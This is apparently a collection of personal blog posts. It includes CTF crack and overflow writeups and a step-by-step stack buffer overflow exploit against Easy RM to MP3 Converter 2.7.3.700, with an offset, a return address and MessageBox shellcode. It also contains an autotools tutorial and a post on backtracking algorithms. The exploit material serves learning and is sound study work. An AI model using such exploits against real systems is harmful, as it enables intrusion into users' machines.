<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>import os
#f = open('ret.txt','w')
for i in range(10):
    for j in range(10):
        for k in range(10):
            param = str(i)+str(j)+str(k)
            ret = os.popen('1.exe ' + param)
            #f.write(param + ":" + ret.read())
            if(ret.read() == "Yes\n"):
                print 'The answer is :' + param
#f.close()
</code></pre></div></div>
<p>Here is the result in Python:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>>>>
The answer is :918
>>>
</code></pre></div></div>
<p>Running the original program again:</p>
<p><img src="/assets/img/xdcsc2010/04pojie/1.PNG" alt="" /></p>
XDCSC2010破解题12014-03-17T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2014/03/17/xdcsc-03pojie
<p>This is a crack challenge; the program can be downloaded here: <a href="/assets/file/xdcsc2010/03pojie.zip">03 crack</a>.
It asks for the correct password, so it shouldn't be too hard. I threw it straight into IDA and hit F5 (don't judge me for always pressing F5 — F5 for the big picture, OD for the details), and to my delight the flow was crystal clear.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int __cdecl wmain()
{
const char *v1; // [sp-4h] [bp-20Ch]@2
char v2; // [sp+4h] [bp-204h]@1
char Dst; // [sp+5h] [bp-203h]@1
unsigned int v4; // [sp+204h] [bp-4h]@1
int v5; // [sp+208h] [bp+0h]@1
v4 = (unsigned int)&v5 ^ __security_cookie;
printf(&Format);
v2 = 0;
memset(&Dst, 0, 0x1FFu);
scanf(&byte_402108, &v2);
if ( strcmp(&v2, (const char *)&unk_40210C) )
v1 = &byte_402130;
else
v1 = (const char *)&unk_402114;
printf(v1);
return 0;
}
</code></pre></div></div>
<p>So it simply compares the input string. But then, looking at the string at 40210C, I was stumped: it contains a 0x1F, which has no corresponding key on the keyboard — how are you supposed to type it? I remembered a classmate once asking exactly this question about entering characters with no keyboard mapping in cmd. I vaguely recalled pipes at the time, but it didn't come to mind while solving this. Later I asked Wu, and the moment he said "redirection" I got it. Damn, how could I have forgotten that.</p>
<p>The corresponding password is shown in the figure:</p>
<p><img src="/assets/img/xdcsc2010/03pojie/1.PNG" alt="" /></p>
<p>So I dutifully built a binary file named data with the following content:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>1F 65 63 6D 32 30 34 00
</code></pre></div></div>
<p>and ran in cmd:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>软件破解1.exe < data
</code></pre></div></div>
<p>It reported a wrong password. This actually involves a quirk of scanf. We usually call scanf like this:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>scanf("%s",a)
scanf("%d",&d)
</code></pre></div></div>
<p>But scanf also supports a form like scanf("This is test%s", a): you must first type the literal non-format characters "This is test" before the input matched by %s, and only the %s part is stored in the buffer a. This program compares the password against the buffer byte by byte. In our data file, the leading 1F is consumed as the literal prefix character, so to match the password we have to supply one more 1f — in other words, data should contain:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>1F 1F 65 63 6D 32 30 34 00
</code></pre></div></div>
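<p>Instead of a hex editor, the data file can be produced with a short Python snippet — a sketch whose bytes are exactly those listed above:</p>

```python
# 1F 1F 65 63 6D 32 30 34 00: the doubled 0x1F, then "ecm204", then a NUL
payload = b'\x1f\x1f' + b'ecm204' + b'\x00'

with open('data', 'wb') as f:  # binary mode: 0x1f cannot be typed as text
    f.write(payload)
```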
<p>With this data file, running</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>软件破解1.exe < data
</code></pre></div></div>
<p>succeeds.</p>
<p><img src="/assets/img/xdcsc2010/03pojie/2.PNG" alt="" /></p>
一道XDCSC2010溢出题2014-03-17T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2014/03/17/xdcsc-01yichu
<p>Yesterday I happened to visit xdsec.org and found past competition problems posted there. On a whim I downloaded the xdcsc2010 problems to have a look; these are my notes on the first one.</p>
<p>This is an overflow challenge; the program can be downloaded here: <a href="/assets/file/xdcsc2010/01yichu.zip">ExploitMe</a>. The requirements are as follows:</p>
<p><img src="/assets/img/xdcsc2010/01yichu/1.png" alt="" /></p>
<p>Fire up IDA, locate the key function, and hit F5; below is the rough flow.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>signed int __cdecl sub_401000()
{
HANDLE v0; // eax@1
void *v1; // edi@1
void *v2; // ebp@1
HANDLE v3; // eax@1
void *v4; // esi@1
unsigned int v5; // ebx@2
HMODULE v6; // esi@3
signed int v8; // [sp+10h] [bp-318h]@1
void *hHeap; // [sp+14h] [bp-314h]@1
HANDLE v10; // [sp+18h] [bp-310h]@1
DWORD NumberOfBytesRead; // [sp+1Ch] [bp-30Ch]@1
int (**v12)(); // [sp+20h] [bp-308h]@1
char v13; // [sp+24h] [bp-304h]@4
int v14; // [sp+A4h] [bp-284h]@1
char v15; // [sp+A8h] [bp-280h]@6
char Buffer; // [sp+128h] [bp-200h]@3
v8 = 0;
v12 = &off_4050B4;
v14 = (int)off_4050B0;
NumberOfBytesRead = 0;
v0 = HeapCreate(0, 0x1000u, 0x10000u);
v1 = v0;
hHeap = v0;
v2 = HeapAlloc(v0, 0, 0x200u);
v3 = CreateFileA("exploit.dat", 0x80000000u, 1u, 0, 4u, 0x80u, 0);
v4 = v3;
v10 = v3;
if ( v3 != (HANDLE)-1 )
{
v5 = GetFileSize(v3, 0);
if ( v5 <= 0x200 )
{
ReadFile(v4, &Buffer, v5, &NumberOfBytesRead, 0);
memcpy(v2, &Buffer, v5);
memset(&Buffer, 0, 0x200u);
v6 = LoadLibraryA("user32.dll");
dword_408510 = (int)GetProcAddress(v6, "MessageBoxW");
dword_408514 = (int)GetProcAddress(v6, "MessageBoxA");
if ( v5 <= 0x84 )
memcpy(&v13, v2, v5);
HeapFree(hHeap, 1u, v2);
memset(v2, 0, 0x80u);
if ( v5 <= 0x84 )
memcpy(&v15, v2, v5);
((void (__thiscall *)(int (***)()))*v12)(&v12);
(*(void (__thiscall **)(int *))v14)(&v14);
v1 = hHeap;
v4 = v10;
v8 = 1;
}
}
if ( v4 )
CloseHandle(v4);
if ( v2 )
HeapFree(v1, 1u, v2);
if ( v1 )
HeapDestroy(v1);
return v8;
}
</code></pre></div></div>
<p>The program flow is fairly clear: it reads the data from exploit.dat onto the stack, copies it to the heap, then shuffles it back to the stack — really tiresome. This misled me at first into overthinking, assuming heap overflows and the like were involved. The key point is the two calls at the end of the function, through v12 and v14; debugging shows that the data in v14 is under our control. Here I made a mistake that cost me a lot of time: noticing that the function had already obtained the address of MessageBoxA (dword_408514), I wanted to jump straight to it, but I could never construct the arguments because esp sat at a lower address and that region of the stack could not be overwritten by our data.</p>
<p>It only clicked this morning: with eip under control, there is nothing we cannot do. Simply point eip at stack data we can overwrite, write a few push instructions as shellcode, and then jump into MessageBoxA. The final exploit.dat is as follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>00000000h: 7C FC 12 00 51 6A 00 68 C8 FC 12 00 68 D8 FC 12 ; |?.Qj.h赛..h攸.
00000010h: 00 6A 00 B9 14 85 40 00 FF 11 59 C3 00 00 00 00 ; .j.?匑..Y?...
00000020h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ; ................
00000030h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ; ................
00000040h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ; ................
00000050h: 45 78 70 6C 6F 69 74 4D 65 00 00 00 00 00 00 00 ; ExploitMe.......
00000060h: 45 78 70 6C 6F 69 74 20 73 75 63 63 65 73 73 00 ; Exploit success.
00000070h: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ; ................
00000080h: 78 FC 12 00 ; x?.
</code></pre></div></div>
<p>The result of the overflow:</p>
<p><img src="/assets/img/xdcsc2010/01yichu/2.PNG" alt="" /></p>
exploit编写笔记1——基于栈的溢出2014-03-16T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2014/03/16/exploit-buffer-overflow
<p>I learned about exploitation long ago, but at the time I dismissed it as little tricks played against contrived toy vulnerabilities. Recently I decided to pick it up again and work through the corelan tutorials, writing exploits against real vulnerabilities one at a time. This is the first installment: the time-honored buffer overflow. I used to work in OllyDbg or windbg, but now I want to practice with Immunity Debugger, so this whole post uses Immunity.</p>
<p><strong>Target software</strong></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Easy RM to MP3 Converter(版本2.7.3.700)
</code></pre></div></div>
<p><strong>Tools</strong></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Immunity Debugger
</code></pre></div></div>
<p><strong>Vulnerability description</strong></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>通过创建一个恶意的.m3u文件将触发Easy RM to MP3 Converter (version 2.7.3.700)缓冲区溢出利用。
</code></pre></div></div>
<p><strong>Test platform</strong></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> Microsoft Windows XP Professional 5.1.2600 Service Pack 3 Build 2600
</code></pre></div></div>
<p>The detailed exploitation steps follow.</p>
<h3>1. Triggering the vulnerability</h3>
<p>First we build a .m3u file of 30000 characters: the first 25000 are 'A' and the last 5000 are 'B'. Here is the script that builds it:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> filename = "crash.m3u"
f = open(filename,'w')
data = 'A' * 25000 + 'B' * 5000
f.write(data)
f.close()
</code></pre></div></div>
<p>Load this crash.m3u with Easy RM to MP3 Converter; an error occurs — view the details, as shown in the figure.</p>
<p><img src="/assets/img/exploit1/1.PNG" alt="" /></p>
<p>The figure shows that the return address after the overflow is 0x42424242, i.e. 'BBBB', which means the bytes that overwrite EIP lie somewhere between offsets 25000 and 30000. Next we use Immunity's mona plugin for a precise fix.</p>
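<p>The correspondence between the 'B' bytes and the value seen in EIP is just little-endian interpretation, which is easy to check in Python:</p>

```python
import struct

# Four 'B' characters (0x42) from the overflow, read as a little-endian
# DWORD, give exactly the return address shown in the crash dialog:
eip = struct.unpack('<I', b'BBBB')[0]
print(hex(eip))  # 0x42424242
```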
<h3>2. Locating EIP</h3>
<p>Load Easy RM to MP3 Converter under Immunity Debugger, let it run, and load crash.m3u. When the exception occurs, Immunity takes over.</p>
<p>First set mona's working directory:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>!mona config -set workingfolder c:\mona\%p
</code></pre></div></div>
<p>Create a pattern of 5000 characters:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>!mona pattern_create 5000
</code></pre></div></div>
<p><img src="/assets/img/exploit1/2.PNG" alt="" /></p>
<p>The pattern file is now at C:\mona\RM2MP3Converter\pattern.txt. Replace the last 5000 characters of crash.m3u with the 5000 characters of the pattern. The script:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> filename = "crash_pattern.m3u"
f = open(filename,'w')
data = 'A' * 25000
fp = open("pattern.txt",'r')
data += fp.read()
f.write(data)
f.close()
</code></pre></div></div>
<p>Here pattern.txt is the bare 5000-character file with mona's extra information removed. Open the target program again and load crash_pattern.m3u; the EIP at the crash is shown below:</p>
<p><img src="/assets/img/exploit1/3.PNG" alt="" /></p>
<p>In the command box enter:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>!mona pattern_offset 366a4235
</code></pre></div></div>
<p><img src="/assets/img/exploit1/4.PNG" alt="" /></p>
<p>We can see that EIP is overwritten at offset 25000 + 1067.</p>
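<p>What pattern_create and pattern_offset do can be reproduced with a small Python sketch — the Metasploit-style cyclic pattern of uppercase/lowercase/digit triples; mona's real implementation has more options:</p>

```python
import string
import struct

def pattern_create(length):
    """Cyclic 'Aa0Aa1Aa2...' pattern: every 4-byte window is unique."""
    out = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out.append(upper + lower + digit)
                if len(out) * 3 >= length:
                    return ''.join(out)[:length]
    return ''.join(out)[:length]

def pattern_offset(pattern, eip):
    """Recover the offset from a crash EIP: the register holds four
    consecutive pattern bytes in little-endian order."""
    needle = struct.pack('<I', eip).decode('ascii')
    return pattern.find(needle)

print(pattern_offset(pattern_create(5000), 0x366a4235))  # 1067, as mona reports
```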
<p>Now let's verify the offset with the following script:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> filename = "crash.m3u"
f = open(filename,'w')
data = 'A' * 26067 + 'B' * 4 + 'C'*100
f.write(data)
f.close()
</code></pre></div></div>
<p><img src="/assets/img/exploit1/5.PNG" alt="" /></p>
<p>We can see that EIP is now four 'B's, so the offset is correct. Next comes the question of what to write into EIP.</p>
<h3>3. Finding space for the shellcode</h3>
<p>Using the same .m3u file again, open the stack window at the crash:</p>
<p><img src="/assets/img/exploit1/6.PNG" alt="" /></p>
<p>We see that ESP is 000FF730 at this point, and there are 3*4 = 12 bytes between the EIP overwrite and ESP. The shellcode is stored starting at ESP.</p>
<h3>4. Finding a jmp esp address</h3>
<p>Load the target program again, press Run and then Pause. In the CPU window, right-click Search For -&gt; All commands in All modules and, in the resulting window, enter jmp esp.</p>
<p><img src="/assets/img/exploit1/7.PNG" alt="" /></p>
<p>We pick 7C874413.</p>
<h3>5. Building the final input file</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> shellcode = ("\xFC\x33\xD2\xB2\x30\x64\xFF\x32\x5A\x8B"
"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x33\xC9"
"\xB1\x18\x33\xFF\x33\xC0\xAC\x3C\x61\x7C"
"\x02\x2C\x20\xC1\xCF\x0D\x03\xF8\xE2\xF0"
"\x81\xFF\x5B\xBC\x4A\x6A\x8B\x5A\x10\x8B"
"\x12\x75\xDA\x8B\x53\x3C\x03\xD3\xFF\x72"
"\x34\x8B\x52\x78\x03\xD3\x8B\x72\x20\x03"
"\xF3\x33\xC9\x41\xAD\x03\xC3\x81\x38\x47"
"\x65\x74\x50\x75\xF4\x81\x78\x04\x72\x6F"
"\x63\x41\x75\xEB\x81\x78\x08\x64\x64\x72"
"\x65\x75\xE2\x49\x8B\x72\x24\x03\xF3\x66"
"\x8B\x0C\x4E\x8B\x72\x1C\x03\xF3\x8B\x14"
"\x8E\x03\xD3\x52\x33\xFF\x57\x68\x61\x72"
"\x79\x41\x68\x4C\x69\x62\x72\x68\x4C\x6F"
"\x61\x64\x54\x53\xFF\xD2\x68\x33\x32\x01"
"\x01\x66\x89\x7C\x24\x02\x68\x75\x73\x65"
"\x72\x54\xFF\xD0\x68\x6F\x78\x41\x01\x8B"
"\xDF\x88\x5C\x24\x03\x68\x61\x67\x65\x42"
"\x68\x4D\x65\x73\x73\x54\x50\xFF\x54\x24"
"\x2C\x57\x68\x4F\x5F\x6F\x21\x8B\xDC\x57"
"\x53\x53\x57\xFF\xD0\x68\x65\x73\x73\x01"
"\x8B\xDF\x88\x5C\x24\x03\x68\x50\x72\x6F"
"\x63\x68\x45\x78\x69\x74\x54\xFF\x74\x24"
"\x40\xFF\x54\x24\x40\x57\xFF\xD0");
ret = "\x13\x44\x87\x7c";
filename = "crash.m3u"
f = open(filename,'w')
data = 'A' * 26067 + ret + '\x90' * 12 + shellcode
f.write(data)
f.close()
</code></pre></div></div>
<p><img src="/assets/img/exploit1/8.PNG" alt="" /></p>
<p>As the screenshot shows, the exploit succeeded.</p>
An introduction to autotools2014-01-15T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2014/01/15/autotool
<p>Installing open-source software usually takes three steps:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>./configure
make
make install
</code></pre></div></div>
<p>This post walks through a small example of using the autotools to simplify building and installing a program.
Running ./configure checks that everything needed to build the program is present, and turns the (*.in) templates into their final files (Makefile, config.h, ...). Once ./configure succeeds, the Makefile exists; running make compiles the program, and make install installs it. I will skip the autotools theory, which is easy to find online, and simply record the process. The overall release flow is shown below:</p>
<p><img src="/assets/img/autotool/1.PNG" alt="" /></p>
<p>Let's create a minimal helloworld project with the following layout.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> helloworld
|
|--include
| --hello.hxx world.hxx
|
|--lib
| |--hello.cxx world.cxx
| --Makefile.am
|
|--src
| |--main.cxx
| --Makefile.am
|
|--Makefile.am
|--README, NEWS, ChangeLog, AUTHORS
</code></pre></div></div>
<ol>
<li>
<p>First create the directory structure shown above, using this script:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> mkdir helloworld
cd helloworld
mkdir include
cd include
touch hello.hxx world.hxx
cd ..
mkdir lib
cd lib
touch hello.cxx world.cxx Makefile.am
cd ..
mkdir src
cd src
touch main.cxx Makefile.am
cd ..
touch NEWS README ChangeLog AUTHORS Makefile.am
</code></pre></div> </div>
</li>
<li>
<p>The files have the following contents:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> //main.cxx
#include "hello.hxx"
#include "world.hxx"
#include "config.h" // make configure results available
int main()
{
hello first_word;
world second_word;
std::cout<<PACKAGE_STRING; /* use the preprocessor definitions
from config.h */
first_word.print();
second_word.print();
return 0;
}
//hello.hxx
#include <iostream>
#ifndef HELLO_HXX
#define HELLO_HXX
class hello{
public:
void print();
};
#endif
//hello.cxx
#include "hello.hxx"
void hello::print()
{
std::cout<<" Hello ";
}
</code></pre></div> </div>
</li>
</ol>
<p>The world class mirrors hello: copy hello.hxx and hello.cxx and replace "hello" with "world".</p>
<ol>
<li>
<p>Run autoscan to generate configure.scan, a template; rename it to configure.ac and edit it to the following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> # -*- Autoconf -*-
# Process this file with autoconf to produce a configure script.
AC_PREREQ([2.68])
AC_INIT(helloworld, 0.01, [email protected])
AM_INIT_AUTOMAKE
AC_CONFIG_SRCDIR([include/hello.hxx])
AC_CONFIG_HEADERS([config.h])
# Checks for programs.
AC_PROG_CXX
AC_PROG_RANLIB
# Checks for libraries.
# Checks for header files.
# Checks for typedefs, structures, and compiler characteristics.
# Checks for library functions.
AC_CONFIG_FILES([Makefile
lib/Makefile
src/Makefile])
AC_OUTPUT
</code></pre></div> </div>
</li>
<li>
<p>Fill in each directory's Makefile.am:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> helloworld/Makefile.am:
SUBDIRS=lib src
helloworld/lib/Makefile.am:
noinst_LIBRARIES=libhw.a ## static library which is not to be installed
libhw_a_SOURCES=hello.cxx hello.hxx world.cxx world.hxx
libhw_a_CXXFLAGS=-I../include ## add path to headerfiles
helloworld/src/Makefile.am:
bin_PROGRAMS=helloworld
helloworld_SOURCES=main.cxx
helloworld_CXXFLAGS= -I../include ## add path to headerfiles
helloworld_LDADD=../lib/libhw.a ## link with static library
</code></pre></div> </div>
</li>
<li>
<p>Next run aclocal, autoconf, and autoheader, then run automake -a. At this point all the required files are in place.</p>
</li>
<li>
<p>Run ./configure to watch the checks run, make to compile the program, and sudo make install to install it.</p>
</li>
</ol>
Backtracking and examples2014-01-12T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2014/01/12/backtrack
<ul>
<li><a href="#第一节">Origin</a></li>
<li><a href="#第二节">Backtracking in brief</a></li>
<li><a href="#第三节">All possible pop orders</a></li>
<li><a href="#第四节">The eight queens problem</a></li>
</ul>
<h3 id="第一节">Origin</h3>
<p>I have been reading <a href="http://book.douban.com/subject/10432347/">Algorithms</a>, which includes an old classic: given that 0~9 are pushed onto a stack in a fixed order, which pop orders are impossible? For example 0,1,2,…,7,8,9 is clearly possible, and so is 9,8,7,…,3,2,1, but 8,2,3,… is not.
The problem itself is fairly simple; the follow-up it suggests is enumerating all possible pop orders, which is a good excuse to revisit backtracking.</p>
<p>First the original problem. The key is to simulate the pushes and pops. Say the sequence to check is 4,3,2,1,0,9,8,7,6,5. Since the first value popped is 4, the values 0,1,2,3 must already have been pushed in order.</p>
<ol>
<li>
<p>Start with an empty stack s, an index into the input sequence (the next value expected to pop), and the next value to push, in. Both index and in start at 0; input is the sequence to check;</p>
</li>
<li>
<p>While in is not equal to input[index], push in and increment it, until it equals input[index];</p>
</li>
<li>
<p>in++, index++; this means 4 has been popped successfully;</p>
</li>
<li>
<p>Then compare s.peek() with input[index]: if they differ, keep pushing in the loop; if they match, pop;</p>
</li>
</ol>
<p>Let's trace the program by hand on the example:</p>
<ol>
<li>
<p>in=0, input[0]=4, so push 0,1,2,3 onto s;</p>
</li>
<li>
<p>When in=4, in=input[0]; then in=5, index=1;</p>
</li>
<li>
<p>The stack top 3 equals input[index], so index=2; the matches continue all the way down to 0; at that point index=5, in=5, and s is empty;</p>
</li>
<li>
<p>5 is less than 9, so push 5,6,7,8;</p>
</li>
</ol>
<p>The rest repeats steps 1~3.</p>
<p>The code:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>public class StackSeq
{
public static boolean isOk(int[] input,int n)
{
int index = 0;
int in = 0;
Stack<Integer> s = new Stack<Integer>();
while(true)
{
if(index >= n - 1)
return true;
if(in >= n)
return false;
if(in != input[index])
{
s.push(in);
++in;
continue;
}
++in;
++index;
while(!s.isEmpty() && s.peek() == input[index])
{
++index;
s.pop();
}
}
}
public static void main(String[] args)
{
StdOut.println("input the number of arrays:");
int n = StdIn.readInt();
int[] input = new int[n];
while(true)
{
for (int i = 0 ; i < n ; ++i)
{
input[i] = StdIn.readInt();
}
boolean ret = isOk(input,n);
if(ret == true)
{
StdOut.println("the sequeue is ok!");
}
else
StdOut.println("the sequeue is not ok!");
}
}
}
</code></pre></div></div>
<p>Forgive my clumsy Java.</p>
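<p>The same push/pop simulation can be sketched more compactly in Python (a hypothetical equivalent, assuming the input is a permutation of 0..n-1):</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>def is_valid_pop_order(seq):
    """seq: a permutation of 0..n-1; True if it is a feasible pop order."""
    stack, nxt = [], 0              # nxt: next value to be pushed
    for want in seq:
        while nxt &lt;= want:          # push until `want` is on top
            stack.append(nxt)
            nxt += 1
        if stack.pop() != want:     # `want` must now be the top of stack
            return False
    return True

print(is_valid_pop_order([4, 3, 2, 1, 0, 9, 8, 7, 6, 5]))  # True
print(is_valid_pop_order([8, 2, 3, 4, 5, 6, 7, 9, 0, 1]))  # False
</code></pre></div></div>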
<h3 id="第二节">Backtracking in brief</h3>
<p>Knowing how to test whether a sequence is a valid pop order, the natural next step is to generate every valid pop order. That is the subject of this post: backtracking. The idea is simple; here is a summary adapted from Baidu Baike:</p>
<p>Walk forward along one path: advance while you can, and when you cannot, back up and try another path. The eight queens problem is the classic example: place the first queen, then place the second in a position that satisfies the constraints; if no position works, move the first queen and place the second queen again, until a valid placement is found. Backtracking is also common in maze search: when a path is blocked, return to the previous junction and try the next branch. Backtracking is essentially exhaustive search, but it uses pruning functions to cut off nodes that cannot possibly lead to a final (answer) state, reducing the number of nodes generated in the state-space tree. It is a search that is both systematic and able to jump: starting from the root, it explores the solution-space tree depth-first, and at each node it first asks whether the subtree rooted there can possibly contain a solution. If it definitely cannot, the whole subtree is skipped and the search backtracks toward the node's ancestors; otherwise it descends into the subtree, still depth-first. When used to find all solutions, backtracking ends only after every subtree of the root has been searched; when used to find any one solution, it can stop as soon as one is found. This depth-first, systematic search of the solution space is called backtracking, and it suits problems with large combinatorial spaces.</p>
<p>I found a good explanation <a href="http://www.csie.ntnu.edu.tw/~u91029/Backtracking.html#1">here</a>. Let's use the problem of generating all r-permutations of 1,2,3,…,n to introduce backtracking, with a figure borrowed from that link:</p>
<p><img src="/assets/img/backtrack/1.png" alt="" /></p>
<p>In the first step we pick one number from 1 to n, say 1, then recursively generate the permutations of the remaining n-1 numbers; when that is done, we backtrack to the first step, pick 2, and so on. To avoid repeating a number, we check before advancing to the next level. The code:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include <iostream>
using namespace std;
int count = 0;
void print(int* a,int m)
{
for (int k = 0; k < m; ++k)
{
cout << a[k] << " ";
}
cout << endl;
}
void tuple(int* a,int i,int m,int n)
{
if(i == m)
{
print(a,m);
count++;
return;
}
for (int k = 1; k <= n; ++k)
{
for (int h = 0; h < i; ++h)
{
if(a[h] == k)
{
goto LOOP;
}
}
a[i] = k;
tuple(a,i+1,m,n);
LOOP:
continue;
}
}
int main()
{
int a[1000];
int n,m;
cout << "input C(n,m) :\n";
cin >> n >> m;
cout << "("<< n <<","<< m << ")排列数" << endl;
tuple(a,0,m,n);
}
</code></pre></div></div>
<p>Computing combinations and full permutations follows easily from this code. To summarize the recursive backtracking pattern: the recursive function first checks the termination condition, then recurses into the next dimension, then backtracks.</p>
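<p>The same pattern — check termination, try each candidate, recurse, undo — can be sketched in Python as a generator (a hypothetical equivalent of the C++ above, not the book's code):</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>def perms(n, m):
    """Yield every m-permutation of 1..n by backtracking."""
    chosen = []
    def backtrack():
        if len(chosen) == m:         # termination: one full permutation
            yield tuple(chosen)
            return
        for k in range(1, n + 1):
            if k in chosen:          # prune: k already used on this path
                continue
            chosen.append(k)         # advance into the next dimension
            yield from backtrack()
            chosen.pop()             # backtrack
    yield from backtrack()

print(len(list(perms(4, 2))))        # 12 ordered pairs
</code></pre></div></div>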
<h3 id="第三节">All possible pop orders</h3>
<p>Now let's apply backtracking to the pop-order problem.</p>
<p>The key observation: after element i is pushed, we face two choices — pop i, or push i+1 — and that is exactly what makes backtracking applicable. The search ends once all N elements have been output. The recursive function is designed like this:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>public static void printiter(int n,int cur,Stack<Integer> tmp,Vector<Integer> out)
</code></pre></div></div>
<p>n is the number of elements (the solution's dimension), cur is the current dimension, tmp holds the pushed elements (one of the two choices), and out holds the popped elements. The termination condition is clearly that out has n elements. The resulting source:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>public static void printiter(int n,int cur,Stack<Integer> tmp,Vector<Integer> out)
{
if(n == out.size())
{
for(int i : out)
{
StdOut.print(i + " ");
}
StdOut.println("");
count++;
return;
}
if(cur != n)//入栈
{
tmp.push(cur);
printiter(n,cur + 1,tmp,out);
tmp.pop();
}
if(!tmp.isEmpty())
{
int x = tmp.pop();
out.add(x);
printiter(n,cur,tmp,out);
out.remove(out.size() - 1);
tmp.push(x);
}
}
</code></pre></div></div>
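<p>The same two-choice recursion can be sketched in Python; for n elements it enumerates the n-th Catalan number of pop orders (a hypothetical rendering, not the original Java):</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>def all_pop_orders(n):
    """Return every feasible pop order for pushes 0..n-1."""
    results = []
    def step(cur, stack, out):
        if len(out) == n:                 # termination: all elements popped
            results.append(tuple(out))
            return
        if cur &lt; n:                       # choice 1: push cur
            stack.append(cur)
            step(cur + 1, stack, out)
            stack.pop()                   # undo the push
        if stack:                         # choice 2: pop the top
            x = stack.pop()
            out.append(x)
            step(cur, stack, out)
            out.pop()                     # undo the pop
            stack.append(x)
    step(0, [], [])
    return results

print(len(all_pop_orders(3)))             # 5, the 3rd Catalan number
</code></pre></div></div>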
<h3 id="第四节">The eight queens problem</h3>
<p>Let's take this chance to revisit the old eight queens problem: place 8 queens on an 8*8 board so that no two attack each other. We'll solve it step by step with the approach above. A natural choice is</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bool solution[7][7]
</code></pre></div></div>
<p>to mark whether each square holds a queen: false means no queen, true means a queen. First we can build the following skeleton, which enumerates every possibility.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include <iostream>
using namespace std;
#define N 8
bool solution[N][N] = {false};
void print_solution()
{
for (int i = 0; i < N; ++i)
{
for (int j = 0; j < N; ++j)
{
cout << solution[i][j] <<" ";
}
cout << endl;
}
cout << "\n\n\n";
}
void QueenIter(int x,int y)
{
if(y == N)
{
x++;
y = 0;
}
if(x == N)
{
print_solution();
return;
}
solution[x][y] = true;
QueenIter(x,y+1);
solution[x][y] = false;
QueenIter(x,y+1);
}
int main()
{
QueenIter(0,0);
}
</code></pre></div></div>
<p>The structure is the same: first check termination, then try every value of this dimension and descend into the next. (The output is huge; if you want to run the program, change N to 4.)</p>
<p>The next step is pruning all the impossible placements; clearly we only need to check at the moment we are about to place a queen.</p>
<p>We keep four bool arrays whose elements record whether each row, column, and diagonal can still take a queen. To force exactly 8 queens we also add a parameter c, and only print a solution when c equals 8.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>void QueenIter(int x,int y,int c)
{
if(y == N)
{
x++;
y = 0;
}
if(x == N)
{
if(c==N)
{
print_solution();
}
return;
}
int d1 = (x+y) % 15;
int d2 = (x-y + 15) % 15;
if(!mx[x] && !my[y] && !md1[d1] && !md2[d2])
{
mx[x] = my[y] = md1[d1] = md2[d2] = true;
solution[x][y] = true;
QueenIter(x,y+1,c+1);
mx[x] = my[y] = md1[d1] = md2[d2] = false;
}
solution[x][y] = false;
QueenIter(x,y+1,c);
}
</code></pre></div></div>
<p>Since each row can hold only one queen, we can improve further:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include <iostream>
using namespace std;
#define N 8
int solution[N] = {0};
bool my[8],md1[15],md2[15];
int count = 0;
void print_solution()
